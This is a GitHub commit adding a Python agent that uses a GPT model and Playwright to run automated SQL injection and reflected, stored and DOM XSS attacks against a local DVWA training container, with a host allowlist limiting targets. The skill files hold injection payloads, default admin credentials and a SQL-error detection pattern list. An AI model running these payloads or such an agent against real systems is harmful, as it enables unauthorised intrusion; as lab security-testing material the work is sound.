Add files via upload

This commit is contained in:
Joas A Santos
2025-08-17 00:00:22 -03:00
committed by GitHub
parent fbf604f68b
commit 30390208cc
41 changed files with 512 additions and 0 deletions

9
docker-compose.yml Normal file
View File

@@ -0,0 +1,9 @@
services:
dvwa:
image: vulnerables/web-dvwa
container_name: dvwa
ports:
- "8080:80"
environment:
- MYSQL_PASS=password
restart: unless-stopped

7
requirements.txt Normal file
View File

@@ -0,0 +1,7 @@
openai>=1.40.0
playwright>=1.46.0
httpx>=0.27.0
pydantic>=2.8.0
tenacity>=8.2.3
rich>=13.7.1
python-dotenv>=1.0.1

BIN
screens/sqli_low.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 100 KiB

BIN
screens/xss_dom_low.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 59 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 90 KiB

BIN
screens/xss_stored_low.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 104 KiB

0
src/__init__.py Normal file
View File

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

0
src/agent/__init__.py Normal file
View File

Binary file not shown.

Binary file not shown.

Binary file not shown.

19
src/agent/orchestrator.py Normal file
View File

@@ -0,0 +1,19 @@
"""Minimal orchestrator that can call planner (GPT-5) to pick actions.
For MVP we call hardcoded skills; planner integration is available for future loops.
"""
from typing import Dict, Any, Callable
from . import planner
from ..skills import login, xss_reflected_low, sqli_low, xss_stored_low, xss_dom_low
SKILLS: Dict[str, Callable[[str], Dict[str, Any]]] = {
"login": lambda base: login.run(base),
"xss_stored_low": lambda base: xss_stored_low.run(base),
"xss_reflected_low": lambda base: xss_reflected_low.run(base),
"xss_dom_low": lambda base: xss_dom_low.run(base),
"sqli_low": lambda base: sqli_low.run(base),
}
def run_skill(base_url: str, skill: str) -> Dict[str, Any]:
if skill not in SKILLS:
raise KeyError(f"Unknown skill: {skill}")
return SKILLS[skill](base_url)

4
src/agent/planner.py Normal file
View File

@@ -0,0 +1,4 @@
from ..openai_client import plan_next_action
def decide(context: dict) -> dict:
return plan_next_action(context)

26
src/agent/score.py Normal file
View File

@@ -0,0 +1,26 @@
import json, argparse
from .agent.orchestrator import run_skill
SUITE = [
("xss_reflected_low", {}),
("xss_stored_low", {}),
("sqli_low", {}),
# depois: ("command_injection_low", {}), ("csrf_low", {}), ("upload_low", {})
]
def main():
ap = argparse.ArgumentParser()
ap.add_argument('--target', required=True)
args = ap.parse_args()
results = []
ok_count = 0
for skill, kwargs in SUITE:
res = run_skill(args.target, skill)
results.append((skill, res))
ok_count += 1 if res.get("ok") else 0
print(f"[{skill}] -> {'OK' if res.get('ok') else 'FAIL'}")
print(f"\nScore: {ok_count}/{len(SUITE)}")
print(json.dumps({k: v for k, v in results}, indent=2, ensure_ascii=False))
if __name__ == "__main__":
main()

11
src/config.py Normal file
View File

@@ -0,0 +1,11 @@
from pydantic import BaseModel
import os
class Settings(BaseModel):
openai_api_key: str = os.getenv("OPENAI_API_KEY", "")
openai_model: str = os.getenv("OPENAI_MODEL", "gpt-5")
allowlist_hosts: list[str] = [h.strip() for h in os.getenv("ALLOWLIST_HOSTS", "localhost,127.0.0.1,dvwa").split(",")]
dvwa_url_env: str = os.getenv("DVWA_URL", "").strip()
headless: bool = os.getenv("HEADLESS", "true").lower() == "true"
settings = Settings()

View File

Binary file not shown.

Binary file not shown.

View File

@@ -0,0 +1,13 @@
import re
SQL_ERRORS = [
r"SQL syntax.*MySQL",
r"Warning: mysql_",
r"Unclosed quotation mark",
r"SQLSTATE\[HY000\]",
r"You have an error in your SQL syntax",
]
compiled = [re.compile(p, re.IGNORECASE) for p in SQL_ERRORS]
def has_sql_error(text: str) -> bool:
return any(c.search(text) for c in compiled)

46
src/openai_client.py Normal file
View File

@@ -0,0 +1,46 @@
from typing import Any, Dict
from openai import OpenAI
from .config import settings
client = OpenAI(api_key=settings.openai_api_key)
def plan_next_action(context: Dict[str, Any]) -> Dict[str, Any]:
"""Ask GPT-5 for the next action using structured JSON output (no chain-of-thought)."""
system = (
"You are a safe web security agent. "
"Only operate on the allowlisted lab host and return STRICT JSON with the next action."
)
user = (
"Given this context, propose one next action as a JSON object with keys: "
"{'tool': 'navigate|fill_form|click|type_and_submit|wait|noop', "
"'target': 'url or selector', 'data': 'payload or null', 'rationale': 'short'}."
"\nContext:\n" + str(context)
)
resp = client.responses.create(
model=settings.openai_model,
input=[
{"role":"system","content":system},
{"role":"user","content":user},
],
temperature=0.2,
top_p=0.9,
max_output_tokens=400,
response_format={ "type": "json_object" },
)
# For SDKs returning parsed JSON via output_parsed
try:
txt = resp.output_parsed
except Exception:
txt = None
if not txt:
try:
txt = resp.output_text
except Exception:
txt = "{}"
if isinstance(txt, dict):
return txt
import json
try:
return json.loads(txt)
except Exception:
return {"tool":"noop","target":"","data":None,"rationale":"fallback"}

15
src/run.py Normal file
View File

@@ -0,0 +1,15 @@
import argparse, json, os
from .config import settings
from .agent.orchestrator import run_skill
def main():
ap = argparse.ArgumentParser()
ap.add_argument('--target', required=False, default=settings.dvwa_url_env or "http://localhost:8080")
ap.add_argument('--skill', required=True, choices=['login','xss_reflected_low','sqli_low', 'xss_stored_low', 'xss_dom_low'])
args = ap.parse_args()
result = run_skill(args.target, args.skill)
print(json.dumps(result, indent=2, ensure_ascii=False))
if __name__ == '__main__':
main()

0
src/skills/__init__.py Normal file
View File

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

12
src/skills/login.py Normal file
View File

@@ -0,0 +1,12 @@
from ..tools.browser import Browser
def run(base_url: str, username: str="admin", password: str="password") -> dict:
"""Login on DVWA (default creds)."""
with Browser(base_url) as b:
b.goto("/login.php")
b.fill('input[name="username"]', username)
b.fill('input[name="password"]', password)
b.click('input[type="submit"]')
body = b.text()
ok = "DVWA Security" in body or "Welcome" in body or "logout" in body.lower()
return {"ok": ok, "page": "home", "evidence": "contains DVWA after login" if ok else body[:500]}

54
src/skills/sqli_low.py Normal file
View File

@@ -0,0 +1,54 @@
# agent/src/skills/sqli_low.py
from ..tools.browser import Browser
from pathlib import Path
def run(base_url: str, payload: str = "1' OR '1'='1' -- ") -> dict:
with Browser(base_url) as b:
# login
b.goto("/login.php")
b.page.wait_for_selector('input[name="username"]', timeout=15000)
b.fill('input[name="username"]', "admin")
b.fill('input[name="password"]', "password")
b.click('input[type="submit"]')
b.page.wait_for_load_state("domcontentloaded")
# security low
try:
b.goto("/security.php")
b.page.wait_for_selector('select[name="security"]', timeout=5000)
b.page.select_option('select[name="security"]', 'low')
b.click('input[type="submit"]')
b.page.wait_for_load_state("domcontentloaded")
except Exception:
pass
# ir para SQLi Low
b.goto("/vulnerabilities/sqli/")
b.page.wait_for_selector('input[name="id"]', timeout=15000)
# enviar payload
b.fill('input[name="id"]', payload)
b.click('input[type="submit"]')
b.page.wait_for_timeout(1200)
# salvar screenshot
agent_dir = Path(__file__).resolve().parents[2]
screens_dir = agent_dir.parent / "screens"
screens_dir.mkdir(parents=True, exist_ok=True)
screenshot_path = screens_dir / "sqli_low.png"
b.page.screenshot(path=str(screenshot_path), full_page=True)
# analisar sucesso
html = b.content()
user_table_markers = ["First name", "Surname", "User ID", "Username"]
found = any(m in html for m in user_table_markers)
return {
"ok": found,
"vector": "SQLi (Low)",
"payload": payload,
"reason": "User table markers present" if found else "payload did not dump table",
"evidence_excerpt": html[:1200],
"screenshot": str(screenshot_path)
}

93
src/skills/xss_dom_low.py Normal file
View File

@@ -0,0 +1,93 @@
# agent/src/skills/xss_dom_low.py
from pathlib import Path
from urllib.parse import urlencode
from ..tools.browser import Browser
# payloads comuns que funcionam no DVWA DOM XSS (param "default")
CANDIDATES = [
'<script>alert("domxss")</script>',
'"><script>alert(\'domxss\')</script>',
'<img src=x onerror=alert("domxss")>',
]
def run(base_url: str) -> dict:
with Browser(base_url) as b:
# 1) login
b.goto("/login.php")
b.page.wait_for_selector('input[name="username"]', timeout=15000)
b.fill('input[name="username"]', "admin")
b.fill('input[name="password"]', "password")
b.click('input[type="submit"]')
b.page.wait_for_load_state("domcontentloaded")
# 2) tentar setar Security=Low (best-effort)
try:
b.goto("/security.php")
b.page.wait_for_selector('select[name="security"]', timeout=5000)
b.page.select_option('select[name="security"]', 'low')
if b.page.locator('input[name="seclev_submit"]').count() > 0:
b.click('input[name="seclev_submit"]')
else:
b.click('input[type="submit"]')
b.page.wait_for_load_state("domcontentloaded")
except Exception:
pass
# 3) hook para capturar alert()
alert = {"ok": False, "message": ""}
def on_dialog(d):
alert["ok"] = True
alert["message"] = d.message
d.accept()
b.page.on("dialog", on_dialog)
# 4) baseline: página “limpa”
b.goto("/vulnerabilities/xss_d/?default=English")
b.page.wait_for_selector("#main_menu", timeout=10000) # qualquer âncora estável
base_html = b.content()
# 5) tentar payloads via GET (?default=...)
for p in CANDIDATES:
qs = urlencode({"default": p})
b.goto(f"/vulnerabilities/xss_d/?{qs}")
b.page.wait_for_timeout(1200) # dá tempo do JS DOM executar
html = b.content()
raw_present = ("<script" in html and "alert(" in html) # às vezes aparece cru no DOM
if alert["ok"] or raw_present:
# screenshot
agent_dir = Path(__file__).resolve().parents[2]
screens_dir = agent_dir.parent / "screens"
screens_dir.mkdir(parents=True, exist_ok=True)
screenshot_path = screens_dir / "xss_dom_low.png"
b.page.screenshot(path=str(screenshot_path), full_page=True)
return {
"ok": True,
"vector": "DOM XSS (Low)",
"payload": p,
"reason": (f'alert() fired: "{alert["message"]}"' if alert["ok"] else "raw <script> found"),
"evidence_contains": p if raw_present else html[:1200],
"screenshot": str(screenshot_path),
"url": b.page.url,
}
# 6) falhou salva screenshot para diagnóstico também
try:
agent_dir = Path(__file__).resolve().parents[2]
screens_dir = agent_dir.parent / "screens"
screens_dir.mkdir(parents=True, exist_ok=True)
screenshot_path = screens_dir / "xss_dom_low_fail.png"
b.page.screenshot(path=str(screenshot_path), full_page=True)
except Exception:
screenshot_path = None
return {
"ok": False,
"vector": "DOM XSS (Low)",
"payload": CANDIDATES[-1],
"reason": "no alert and no raw script detected",
"evidence_contains": base_html[:1200],
"screenshot": str(screenshot_path) if screenshot_path else None,
"url": b.page.url,
}

View File

@@ -0,0 +1,69 @@
# agent/src/skills/xss_reflected_low.py
from ..tools.browser import Browser
from pathlib import Path
def run(base_url: str, payload: str = '<script>alert("reflected")</script>') -> dict:
with Browser(base_url) as b:
# login
b.goto("/login.php")
b.page.wait_for_selector('input[name="username"]', timeout=15000)
b.fill('input[name="username"]', "admin")
b.fill('input[name="password"]', "password")
b.click('input[type="submit"]')
b.page.wait_for_load_state("domcontentloaded")
# security = low (tentativa best-effort)
try:
b.goto("/security.php")
b.page.wait_for_selector('select[name="security"]', timeout=5000)
b.page.select_option('select[name="security"]', 'low')
b.click('input[type="submit"]')
b.page.wait_for_load_state("domcontentloaded")
except Exception:
pass
# ir para XSS Reflected
b.goto("/vulnerabilities/xss_r/")
b.page.wait_for_selector('input[name="name"]', timeout=15000)
# hook p/ capturar alert()
alert_triggered = {"ok": False, "message": ""}
def on_dialog(d):
alert_triggered["ok"] = True
alert_triggered["message"] = d.message
d.accept()
b.page.on("dialog", on_dialog)
# enviar payload
b.fill('input[name="name"]', payload)
b.click('input[type="submit"]')
b.page.wait_for_timeout(1200)
# salvar screenshot
agent_dir = Path(__file__).resolve().parents[2]
screens_dir = agent_dir.parent / "screens"
screens_dir.mkdir(parents=True, exist_ok=True)
screenshot_path = screens_dir / "xss_reflected_low.png"
b.page.screenshot(path=str(screenshot_path), full_page=True)
# analisar sucesso
html = b.content()
raw_present = "<script" in html and "alert(" in html
escaped_present = "&lt;script" in html or "&lt;script&gt;" in html
ok = alert_triggered["ok"] or raw_present
reason = (
f'alert() fired: "{alert_triggered["message"]}"' if alert_triggered["ok"]
else ("raw <script> in response" if raw_present
else ("payload escaped (provável nível > Low)" if escaped_present
else "payload não refletido"))
)
return {
"ok": ok,
"vector": "Reflected XSS (Low)",
"payload": payload,
"reason": reason,
"evidence_contains": (payload if raw_present else html[:1200]),
"screenshot": str(screenshot_path)
}

View File

@@ -0,0 +1,83 @@
# agent/src/skills/xss_stored_low.py
from ..tools.browser import Browser
from pathlib import Path
def run(base_url: str, payload: str = '<script>alert("stored")</script>') -> dict:
with Browser(base_url) as b:
# 1) login
b.goto("/login.php")
b.page.wait_for_selector('input[name="username"]', timeout=15000)
b.fill('input[name="username"]', "admin")
b.fill('input[name="password"]', "password")
b.click('input[type="submit"]')
b.page.wait_for_load_state("domcontentloaded")
# 2) best-effort: Security = Low (se a tela existir)
try:
b.goto("/security.php")
b.page.wait_for_selector('select[name="security"]', timeout=5000)
b.page.select_option('select[name="security"]', 'low')
if b.page.locator('input[name="seclev_submit"]').count() > 0:
b.click('input[name="seclev_submit"]')
else:
b.click('input[type="submit"]')
b.page.wait_for_load_state("domcontentloaded")
except Exception:
pass
# 3) ir para XSS Stored
b.goto("/vulnerabilities/xss_s/")
b.page.wait_for_selector('input[name="txtName"]', timeout=15000)
# 4) preencher
b.fill('input[name="txtName"]', "pwn")
b.fill('textarea[name="mtxMessage"]', payload)
# 5) hook para capturar o alert()
alert_triggered = {"ok": False, "message": ""}
def on_dialog(d):
alert_triggered["ok"] = True
alert_triggered["message"] = d.message
d.accept()
b.page.on("dialog", on_dialog)
# 6) enviar
if b.page.locator('input[name="btnSign"]').count() > 0:
b.click('input[name="btnSign"]')
else:
b.click('input[type="submit"]')
b.page.wait_for_load_state("domcontentloaded")
# 7) aguardar potencial execução do alert
b.page.wait_for_timeout(1200)
# 8) salvar screenshot (pasta screens/ ao lado do projeto)
# base_dir = .../agent -> queremos .../screens
agent_dir = Path(__file__).resolve().parents[2] # .../agent
screens_dir = agent_dir.parent / "screens"
screens_dir.mkdir(parents=True, exist_ok=True)
screenshot_path = screens_dir / "xss_stored_low.png"
b.page.screenshot(path=str(screenshot_path), full_page=True)
# 9) avaliar sucesso: alert() capturado OU payload cru na página
html = b.content()
raw_present = "<script" in html and "alert(" in html
escaped_present = "&lt;script" in html or "&lt;script&gt;" in html
ok = alert_triggered["ok"] or raw_present
reason = (
f'alert() fired: "{alert_triggered["message"]}"' if alert_triggered["ok"]
else ("raw <script> found in page" if raw_present
else ("payload appears escaped (provável nível > Low)" if escaped_present
else "payload not present"))
)
return {
"ok": ok,
"vector": "Stored XSS (Low)",
"payload": payload,
"reason": reason,
"evidence_contains": (payload if raw_present else html[:1200]),
"screenshot": str(screenshot_path)
}

0
src/tools/__init__.py Normal file
View File

Binary file not shown.

Binary file not shown.

51
src/tools/browser.py Normal file
View File

@@ -0,0 +1,51 @@
from playwright.sync_api import sync_playwright
from typing import Optional
from ..config import settings
from urllib.parse import urlparse
class Browser:
def __init__(self, base_url: str):
self.base_url = base_url.rstrip('/')
self._pw = None
self._browser = None
self._context = None
self.page = None
# safety: enforce allowlist
host = urlparse(self.base_url).hostname or ""
if host not in settings.allowlist_hosts:
raise RuntimeError(f"Target host '{host}' not in allowlist: {settings.allowlist_hosts}")
def __enter__(self):
self._pw = sync_playwright().start()
self._browser = self._pw.chromium.launch(headless=settings.headless)
self._context = self._browser.new_context(ignore_https_errors=True)
self.page = self._context.new_page()
return self
def __exit__(self, exc_type, exc, tb):
try:
if self._context: self._context.close()
if self._browser: self._browser.close()
finally:
if self._pw: self._pw.stop()
# helpers
def goto(self, path: str):
url = path if path.startswith("http") else f"{self.base_url}/{path.lstrip('/')}"
self.page.goto(url, wait_until="domcontentloaded")
def fill(self, selector: str, value: str):
self.page.fill(selector, value)
def click(self, selector: str):
self.page.click(selector)
def content(self) -> str:
return self.page.content()
def text(self) -> str:
return self.page.inner_text("body")
def screenshot(self, path: str):
self.page.screenshot(path=path, full_page=True)